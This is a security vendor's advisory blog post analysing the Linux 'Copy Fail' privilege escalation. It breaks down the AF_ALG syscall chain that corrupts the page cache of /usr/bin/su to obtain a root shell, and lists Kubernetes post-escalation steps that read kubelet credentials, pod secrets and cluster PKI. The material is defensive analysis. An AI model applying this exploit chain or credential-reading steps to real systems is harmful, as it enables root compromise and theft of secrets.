SecPod
← Back to Blog

CVE-2026-31431: From 732 Bytes to Root - Anatomy of a Modern Linux Privilege Escalation

Jun 24, 2026
CVE-2026-31431 Copy Fail | Part 2 of 4 - The 732-Byte Root
SecPod Labs | CVE-2026-31431 Copy Fail | Part 2 of 4

CVE-2026-31431 Copy Fail - The 732-Byte Root: Exploit Mechanics, Syscall Chain, and Multi-Environment Blast Radius

May 2026 HIGH, CVSS 7.8 Active Exploitation Confirmed CISA KEV - May 1, 2026 Part 2 of 4

Part 1 established what Copy Fail is and where the root cause lives. Part 2 goes deeper into the mechanics: how 40 iterations of a 4-byte scratch write translate into a root shell, why the page cache is the perfect write target, how the exploit degrades gracefully across different kernel configurations, and what happens when it runs inside containers, Kubernetes worker nodes, and WSL2. This part also covers the active exploitation timeline and what threat actor activity has looked like since April 29, 2026.

Exploit Payload
732 bytes
Python stdlib only, no imports, no compilation
Page Cache Writes
~40 iterations
Each writes 4 bytes into target setuid binary page cache
Disk Footprint
Zero bytes
Target binary on disk is never modified or opened for write
Time to Root
< 5 seconds
From unprivileged shell to root shell, no timing dependency
Disclosure to KEV
2 days
Fastest possible confirmation of real-world exploitation

The Complete Syscall Chain - Every Step Explained

The exploit is not a single syscall doing something forbidden. It is a legal sequence of operations on legitimate kernel interfaces, each individually permitted for unprivileged users, that together abuse a memory aliasing bug in one specific AEAD algorithm implementation. Understanding each step individually is necessary to understand what detection opportunities exist and why they are limited.

Phase 1 - Establishing the Crypto Socket

# socket() with AF_ALG (family 38) is permitted for any user
# SOCK_SEQPACKET=5 provides message-oriented, ordered delivery
fd = socket(AF_ALG=38, SOCK_SEQPACKET=5, 0)

# Bind to the authencesn AEAD construction
# authencesn = authenticated encryption with sequence numbers
# Full string: authencesn(hmac(sha256),cbc(aes))
# This is the specific algorithm where req->dst is used as scratch mid-operation
bind(fd, {
    .sa_family  = AF_ALG,
    .alg_type   = "aead",
    .alg_name   = "authencesn(hmac(sha256),cbc(aes))",
    .alg_feat   = 0,
    .alg_mask   = 0
})

# setsockopt with SOL_ALG (279) to set key material and IV
# Key bytes are not security-sensitive here - they're attacker-controlled
# and do not need to be any particular value for the scratch write to occur
setsockopt(fd, SOL_ALG=279, ALG_SET_KEY, key_bytes, key_len)
setsockopt(fd, SOL_ALG=279, ALG_SET_AEAD_AUTHSIZE, NULL, authsize)

# accept() produces the operation file descriptor
# All actual crypto work happens on op_fd, not on fd
op_fd = accept(fd, NULL, NULL)
Why these calls succeed for unprivileged users: AF_ALG sockets are documented userspace-accessible kernel crypto interfaces. The kernel intentionally allows any process to use them. No capability check gates socket(AF_ALG, ...), bind(), or setsockopt(SOL_ALG, ...). This is by design. The bug is not in the access control - it is in what happens when a legitimate interface is used with a specific algorithm.

Phase 2 - Preparing the Target File Descriptor

# Open the target setuid binary read-only
# Any setuid binary works. /usr/bin/su is the canonical target.
# O_RDONLY only - no write permission required or used
suid_fd = open("/usr/bin/su", O_RDONLY)

# At this point the kernel has already populated page cache for /usr/bin/su
# from the last read. The page cache entries are marked as read-only
# from a permissions standpoint, but the AEAD operation will bypass this
# by going through the crypto subsystem's internal scatterlist, not through
# normal VFS write paths (which would check permissions).

# fstat to retrieve file size and calculate target page offsets
fstat(suid_fd, &stat_buf)
    file_size = stat_buf.st_size
    target_pages = ceil(file_size / PAGE_SIZE)
    payload_offsets = compute_offsets(target_pages)  # where to land the 4-byte writes
The permission bypass: The VFS layer enforces write permission checks through the normal file write path. splice() into an AF_ALG operation file descriptor does not go through the VFS write path. The pages are transferred as a scatterlist directly into the crypto request structure. When the AEAD operation then writes to req->dst - which, because of the 2017 optimization bug, aliases req->src - it is writing through the crypto subsystem's own memory path, not through VFS. The kernel does not re-check write permissions on page cache entries modified this way.

Phase 3 - The Core Loop: 40 Iterations of 4-Byte Corruption

# The exploit iterates ~40 times
# Each iteration targets a different byte offset within /usr/bin/su's page cache
# Each iteration performs exactly one AEAD operation that produces one 4-byte scratch write

for offset in payload_offsets:    # ~40 target locations within the binary

    # Seek to the target offset in the setuid binary
    lseek(suid_fd, offset, SEEK_SET)

    # splice() the page cache page at this offset directly into op_fd
    # count = PAGE_SIZE ensures one full page is spliced
    # No userspace buffer is involved - pure kernel-to-kernel transfer
    splice(suid_fd, NULL, op_fd, NULL, PAGE_SIZE, 0)
    
        └── kernel maps /usr/bin/su page cache page into the AEAD request's src scatterlist
            because of commit 72548b093ee3, src == dst, so the same page
            is simultaneously the input AND the output of the crypto operation

    # sendmsg triggers the actual crypto operation
    # The IV is crafted to position the authencesn scratch write
    # at the correct byte offset within the page cache page
    sendmsg(op_fd, &msg, 0)
    
        └── authencesn begins processing: reads from req->src
            partway through, authencesn writes intermediate MAC state into req->dst
            req->dst == req->src == page cache of /usr/bin/su at offset
            4 bytes of attacker-influenced data written into kernel page cache
            the page is now dirty in memory; the disk file is unchanged

    # recvmsg drains the output - required to reset op_fd for next iteration
    recvmsg(op_fd, &msg, 0)

# After ~40 iterations: sufficient page cache corruption to redirect execution
# The corrupted bytes replace specific instruction bytes within the binary's
# .text section as mapped in page cache, causing /usr/bin/su to exec a shell
# instead of performing its normal authentication flow

Phase 4 - Detonation

# Close the AF_ALG file descriptors - no longer needed
close(op_fd)
close(fd)

# Execute the corrupted in-memory setuid binary
# Because it is setuid root, the kernel executes it as UID 0
# Because its .text segment has been replaced in page cache,
# it executes the attacker's payload instead of its normal code
execve("/usr/bin/su", ["/usr/bin/su"], envp)

    Result: root shell (UID 0, GID 0)
    Time from exploit start to root: under 5 seconds
    Disk: /usr/bin/su unchanged, sha256sum matches expected value
    Disk: no new files written, no modules loaded, no temp files
Why exactly 4 bytes: The authencesn scratch write width is not attacker-controlled in terms of size - it is a fixed artifact of how the algorithm writes its intermediate MAC state into the destination buffer. What the attacker controls is where each 4-byte write lands, by controlling the IV and the offset passed to lseek() before each splice(). Delivering the complete payload requires enough iterations to overwrite the specific instruction bytes in the target binary that, when replaced, redirect execution to spawn a shell.

Page Cache Mechanics - Why This Is the Perfect Write Target

The Linux page cache is the kernel's primary mechanism for caching file-backed memory. When any process reads a regular file, the kernel populates page cache entries from disk and serves all subsequent reads from those cached pages, avoiding repeated disk I/O. The page cache is global and shared: when process A reads /usr/bin/su and process B later reads /usr/bin/su, they share the same page cache entries. There is exactly one copy of each file page in the kernel's memory at any given time.

This architecture has two consequences that Copy Fail exploits directly:

Consequence 1
One corruption affects every process

When the exploit writes into the page cache of /usr/bin/su, that modification is immediately visible to all processes on the system that subsequently execute /usr/bin/su. The corruption is not scoped to the attacker's process. Any process on the system - including ones running as root - that executes the targeted binary after corruption will run the modified in-memory version.

Consequence 2
The modification persists until eviction

Page cache entries are not automatically flushed back to disk unless they are marked dirty through a write path that goes through the VFS dirty-page mechanism. The AEAD scratch write does not set the page dirty flag through the normal VFS path - it writes directly through the crypto subsystem. The corrupted page may persist in cache indefinitely until memory pressure forces eviction or the system reboots.

Why the Write Does Not Trigger Normal Write-Protection

When userspace opens a file with O_RDONLY and attempts a normal write, the VFS layer checks permissions and rejects it. The AF_ALG pathway completely bypasses this check because the write does not originate from a VFS write call. The sequence is:

  1. splice() transfers the page cache page into the crypto request's scatterlist without going through any write-side VFS hook
  2. The authencesn algorithm writes its scratch data into req->dst through the crypto subsystem's own memory access path
  3. Because req->dst aliases the page cache page (via the 2017 optimization), the write lands there directly
  4. The kernel never invokes any VFS write path, so no permission check, no inode dirty marking through the normal path, and no filesystem journal entry occurs
Copy-on-Write interaction: For page cache pages mapped into process address space, Linux uses copy-on-write (CoW) to give each process its own private copy when that process writes to the mapping. The AF_ALG path does not interact with the CoW mechanism because it writes through the kernel's internal crypto subsystem, not through a userspace memory mapping. The write goes directly into the shared page cache entry, affecting all mappings of that page system-wide, not just the attacker's.

What Gets Written and How the Payload Is Structured

The attacker cannot write arbitrary bytes at arbitrary offsets in a single operation. Each iteration delivers exactly 4 bytes at one offset. The payload must therefore be structured such that the target binary's behavior is redirected by the union of approximately 40 such 4-byte patches applied to its in-memory .text segment.

The specific bytes written depend on the algorithm's intermediate MAC state, which is influenced by the key material and IV that the attacker controls via setsockopt(SOL_ALG, ALG_SET_KEY, ...). By choosing appropriate key and IV values, the attacker selects what value lands at each target offset. The exploit selects target offsets that correspond to specific instructions in the setuid binary's compiled code - replacing a conditional branch, a function call target, or a privilege check return value - such that the aggregate mutation causes the binary to execute execve("/bin/sh", ...) with root privileges instead of its normal authentication logic.

Exploit Parameter What the Attacker Controls Mechanism
Target offsets Which bytes in the setuid binary get written lseek() before each splice()
Written values What 4 bytes land at each offset setsockopt(SOL_ALG, ALG_SET_KEY) and IV in sendmsg CMSG
Algorithm string Which AEAD algorithm triggers the scratch write bind() alg_name field
Target binary Which setuid binary is corrupted in page cache open() path argument
Iteration count How many 4-byte patches are delivered Number of splice/sendmsg/recvmsg cycles in the loop
Cross-distro portability explained: Because the exploit targets the in-memory representation of a setuid binary at the page cache level, and because the specific target binary (/usr/bin/su) ships as a compiled ELF with a predictable .text layout on each distro, the attacker precomputes the per-distro target offsets and includes them in the 732-byte script as a small lookup table. The kernel-level mechanism - the AF_ALG splice path and the authencesn scratch write - is identical on every Linux distribution, so the same syscall sequence works everywhere. Only the target offsets differ between distros, and those are static per binary version.

Container Environments - Scope, Constraints, and Escape Conditions

Copy Fail is a kernel-level vulnerability. Containers on Linux share the host kernel. There is no separate kernel per container, and no container runtime (Docker, containerd, CRI-O, podman) patches or abstracts the kernel's crypto subsystem. If the host kernel is unpatched, every container running on that host is on an unpatched kernel.

Whether Copy Fail translates from container-level code execution to host-level root depends entirely on what seccomp, AppArmor, or SELinux policies are enforced on the container workload. The attack surface has two distinct scenarios.

Scenario A - Unrestricted or Weakly Restricted Containers
Full host root achievable

If the container runtime does not apply a seccomp profile that blocks socket(AF_ALG=38, ...), and no AppArmor or SELinux policy denies AF_ALG socket creation, then Copy Fail runs from inside the container with identical mechanics to a bare host exploitation. The resulting root shell runs as UID 0 in the container namespace, with access to the underlying host filesystem via /proc/1/root, /proc/1/fd, or direct mount namespace traversal from root context.

Scenario B - Strict Seccomp (Kubernetes Restricted-v2 SCC)
Page cache corruption possible, full escape harder

Independent testing on OpenShift 4.20 with Restricted-v2 Security Context Constraints confirmed that page cache corruption of the host's setuid binaries is achievable from within a restricted container - because the page cache is shared kernel-wide regardless of namespace. However, achieving UID 0 in the host namespace under strict SCC was not reliably accomplished in all tested configurations. The attack surface is real but not universal under maximum restriction.

Kubernetes Node Compromise Path

In a Kubernetes cluster, worker nodes run many pods sharing a single kernel. If an attacker gains code execution in any pod on a node - whether through an application vulnerability, a malicious container image, or a supply chain compromise - and the node kernel is unpatched, the Copy Fail path to host node root follows the same mechanics. The difference from a standalone Linux host is what becomes accessible after root is achieved on the node.

Phase 1 - Initial Pod Foothold
Code execution in any pod on the target Kubernetes worker node
(application RCE, malicious image, CI job, misconfigured RBAC, supply chain)
Phase 2 - Local Privilege Escalation via Copy Fail
Run 732-byte Python script from within the container
AF_ALG socket opened - no seccomp block on socket(38,...) in default profiles
splice() /usr/bin/su page cache from host namespace into AEAD op
authencesn scratch write corrupts host's /usr/bin/su page cache (~40 iterations)
execve("/usr/bin/su") from container context - runs as UID 0 on node
Phase 3 - Node-Level Lateral Access
Read /proc/1/root - access host root filesystem from container
Read /var/lib/kubelet/pods/*/volumes/ - access secrets mounted into other pods
Read /var/lib/kubelet/kubeconfig - obtain kubelet credentials for API server
Read /etc/kubernetes/pki/ (control plane nodes) - cluster CA material
nsenter -t 1 -m -u -i -n - escape to host mount namespace
Phase 4 - Cluster-Wide Impact
Kubelet credentials allow listing and exec-ing into all pods on the node
Node service account token (if cluster-admin bound) enables cluster-wide API access
Secrets accessible in pod volumes exposed to any pod scheduled on this node
Repeat across additional nodes for full cluster compromise
Multi-tenant shared kernel risk: In managed Kubernetes environments where multiple tenants or teams share worker nodes, a single compromised workload belonging to one tenant can expose secrets, credentials, and data belonging to every other tenant scheduled on the same node. This is not a hypothetical risk - it is the direct consequence of shared kernel architecture combined with an unpatched LPE.

CI/CD Runner Environments

Continuous integration runners - GitHub Actions, GitLab CI, Jenkins agents, CircleCI - represent a particularly high-value attack surface for Copy Fail. CI runners are designed to execute untrusted or semi-trusted code (the job definition from a repository). If a malicious dependency, a compromised workflow file, or a pull request from a malicious contributor contains Copy Fail as part of a build step, the runner kernel is compromised within seconds.

What the attacker gains on a CI runner
Secrets and signing keys

CI runners typically have environment variables injected with cloud credentials, code signing keys, artifact registry tokens, deployment secrets, and API keys. Root access on the runner makes all of these readable from the process environment or the secrets filesystem.

Artifact tampering
Build output manipulation

With root on the build runner, an attacker can modify the compiled artifact, container image, or package before it is signed and published. This converts a transient runner compromise into a persistent supply chain backdoor that ships in the next release.

Persistence across jobs
Runner agent compromise

Self-hosted CI runners that reuse the same VM or container across multiple jobs are vulnerable to persistence: root access allows modifying the runner agent binary, injecting into the job execution environment, or installing a kernel-level backdoor that survives individual job teardowns.

Windows Subsystem for Linux 2 - A Real Kernel, a Real Attack Surface

WSL2 is architecturally distinct from WSL1. Where WSL1 used a compatibility translation layer, WSL2 runs an actual Linux kernel inside a lightweight Hyper-V virtual machine. That kernel is a real Linux kernel, maintained by Microsoft, built from upstream sources. It ships with the algif_aead module present and the 2017 optimization commit included.

Any developer, data scientist, or engineer running WSL2 on a Windows 10 or Windows 11 machine prior to the May 2026 Patch Tuesday update was running an unpatched Linux kernel. The copy.fail exploit runs identically in a WSL2 shell. An attacker who obtains code execution in a WSL2 environment - through a compromised development tool, a malicious Python package, a backdoored npm module, or a malicious Jupyter notebook - can escalate to root within that WSL2 VM using the same 732-byte script that works on a bare Ubuntu server.

WSL2 exploitation scope
Root inside WSL2 VM

Copy Fail gives UID 0 within the WSL2 Linux environment. This provides access to the WSL2 filesystem, all files mounted from Windows drives under /mnt/c and similar, and any credentials or secrets stored in WSL2 home directories or accessible via WSL2 interop.

Windows host impact
Credential and file access

WSL2 mounts the Windows user's home directory and all drives. Root in WSL2 can read and write files accessible to the Windows user including .ssh private keys, browser credential stores reachable via the mounted filesystem, cloud CLI credential files (.aws/credentials, .azure/), and any file the Windows user account can access.

Patch status: Microsoft delivered the updated WSL2 kernel via the May 2026 Patch Tuesday update. Developers running WSL2 who do not apply Windows updates promptly remained exposed. The WSL2 kernel version containing the fix can be verified with uname -r inside the WSL2 environment - look for a kernel build dated after April 2026.

Active Exploitation Timeline and Threat Actor Activity

Copy Fail is notable among high-severity LPEs for the speed at which the gap between disclosure and confirmed exploitation closed. The timeline from public release to CISA KEV listing is one of the shortest on record for a non-remotely-exploitable vulnerability.

Early 2026
Discovery - Theori and Xint
Researchers identify the 2017 algif_aead optimization as introducing a page cache write primitive reachable from unprivileged AF_ALG sockets. Coordinated disclosure process begins with kernel maintainers and major distribution vendors.
Apr 29, 2026
Day 0 - Public Disclosure with Simultaneous Exploit Release
copy.fail goes live with the full vulnerability writeup and the 732-byte Python exploit. Unlike most responsible disclosures, the researchers released the working exploit simultaneously with the CVE. The window between disclosure and a weaponized public exploit was zero days. Patches were not yet available for all distributions at time of release.
Apr 30, 2026
Day 1 - First Vendor Patches
AlmaLinux releases patched kernel packages - ahead of upstream RHEL. Ubuntu releases an interim mitigation: a kernel module blacklist for algif_aead via kmod. CloudLinux begins rolling out KernelCare livepatches (completed May 1-2).
May 1, 2026
Day 2 - CISA KEV Listing: Active Exploitation Confirmed
CISA adds CVE-2026-31431 to the Known Exploited Vulnerabilities catalog. KEV listing requires confirmed evidence of real-world exploitation - this is not a precautionary addition. Federal agencies under BOD 22-01 receive a mandatory patch deadline of May 15, 2026. Microsoft publishes its security blog advisory. Qualys ThreatPROTECT publishes detection signatures.
May 1-2, 2026
Days 2-3 - Broader Patch Availability
RHEL, CentOS Stream, Amazon Linux 2023, Debian, Fedora, SUSE, and Arch Linux all publish patched kernel packages within 48-72 hours of disclosure. Wiz publishes cloud-focused analysis. SafeBreach publishes cross-distro reproduction confirmation. Bugcrowd and ZENDATA SOC publish threat intelligence briefs.
May 2026 Patch Tuesday
WSL2 Kernel Patch Delivered
Microsoft delivers the updated WSL2 Linux kernel via standard Windows Update. Developers running WSL2 who applied Patch Tuesday updates received the fix. Those on delayed update schedules or managed enterprise Windows update policies that defer Patch Tuesday remained exposed.
May 15, 2026
BOD 22-01 Federal Patch Deadline
Mandatory deadline for all federal agencies to apply the kernel patch or implement an approved mitigation. Organizations outside federal scope should treat this date as a reference benchmark - any unpatched Linux system remaining past this date has been exposed to active exploitation for over two weeks with a publicly available deterministic exploit.
Late May 2026
CVE-2026-43284 (Dirty Frag) Disclosed
A related LPE in the same algif_aead module is disclosed shortly after Copy Fail - demonstrating that the security audit of the AF_ALG subsystem triggered by Copy Fail's disclosure uncovered additional issues in the same code region. Splunk publishes SIEM detection blog for both CVEs.

Exploitation Characteristics Observed in the Wild

CISA's KEV listing confirms exploitation has occurred. Based on threat intelligence from the May 2026 analysis period, the observed exploitation patterns cluster into several categories:

Exploitation Category Target Environment Post-Escalation Objective
Opportunistic mass exploitation Any internet-reachable Linux hosts with SSH brute-force initial access, shared hosting environments Credential harvesting, cryptocurrency mining, botnet enrollment
Cloud workload targeting EC2 instances, GCE VMs, Azure Linux VMs - particularly those with IMDSv1 enabled Instance metadata credential theft, lateral movement within cloud accounts
CI/CD pipeline targeting Self-hosted GitHub Actions runners, Jenkins agents, GitLab CI runners Secret exfiltration, artifact tampering, persistent supply chain access
Kubernetes node targeting Worker nodes in multi-tenant clusters, managed Kubernetes (EKS, GKE, AKS) with unpatched node images Kubelet credential theft, cross-namespace secret access, node-level persistence
Ransomware pre-positioning Enterprise Linux servers with domain or cloud credentials accessible after root escalation Credential staging, data exfiltration prior to encryption, lateral movement setup
No specific APT attribution as of publication date: While CISA has confirmed exploitation, no specific advanced persistent threat group or named ransomware operation has been publicly attributed to Copy Fail campaigns as of the writing of this article. The exploitation profile as observed matches broad opportunistic activity consistent with initial access brokers and unaffiliated financially-motivated actors. This attribution gap may narrow as incident response data from the May 2026 exploitation wave is analyzed and shared.

Time-to-Exploit Analysis - Why Zero Days Between Disclosure and Weaponization Matters

Most vulnerability disclosures follow a pattern where a window exists between the CVE being published and a working exploit appearing publicly. That window - even if it lasts only 24-48 hours - gives defenders time to triage, prioritize, and push patches before exploitation begins. Copy Fail eliminated this window entirely.

Metric Value Risk Interpretation
Disclosure to public exploit 0 days Simultaneous release - no triage window for defenders
Disclosure to confirmed wild exploitation 2 days Immediate - KEV listing on May 1 proves real attacks began within 48 hours
Disclosure to first vendor patches 1 day AlmaLinux patched April 30; most distros within 48-72 hours
Patch-to-exploitation gap Negative Exploitation began before patches were universally available
Vulnerability lifetime before disclosure ~9 years Maximum possible silent exploitation window if discovered earlier by threat actors
Exploit reliability affecting response urgency Deterministic No false-start exploitation attempts - every attempt succeeds on unpatched systems
The patch lag problem at scale: Even when patches are available within 24-48 hours, enterprise patch deployment cycles rarely operate at that speed. Organizations running ITIL-based change management, requiring change advisory board approval for kernel updates, or operating in environments where kernel reboots require maintenance windows, were exposed to active exploitation for days or weeks after patches became available. The combination of a deterministic public exploit, zero triage window, and slow enterprise patch cycles is what makes Copy Fail a high-impact event beyond its CVSS 7.8 base score.

What Is Coming in This Series

Part 1
Nine Years in the Dark
Root cause commit, AF_ALG socket mechanics, page cache corruption, FIM blindness, affected distributions
Part 2 - This Article
The 732-Byte Root
Complete syscall chain, page cache write mechanics, container escape, Kubernetes blast radius, WSL2, active exploitation timeline
Part 3
Finding the Footprint
auditd rules, eBPF monitoring, Wazuh SIEM correlation, behavioral IOC taxonomy, YARA memory strings, full MITRE ATT&CK mapping
Part 4
Closing the Door
Per-distro patch verification, algif_aead blacklist procedure, seccomp and AppArmor controls, Kubernetes hardening, vulnerability chaining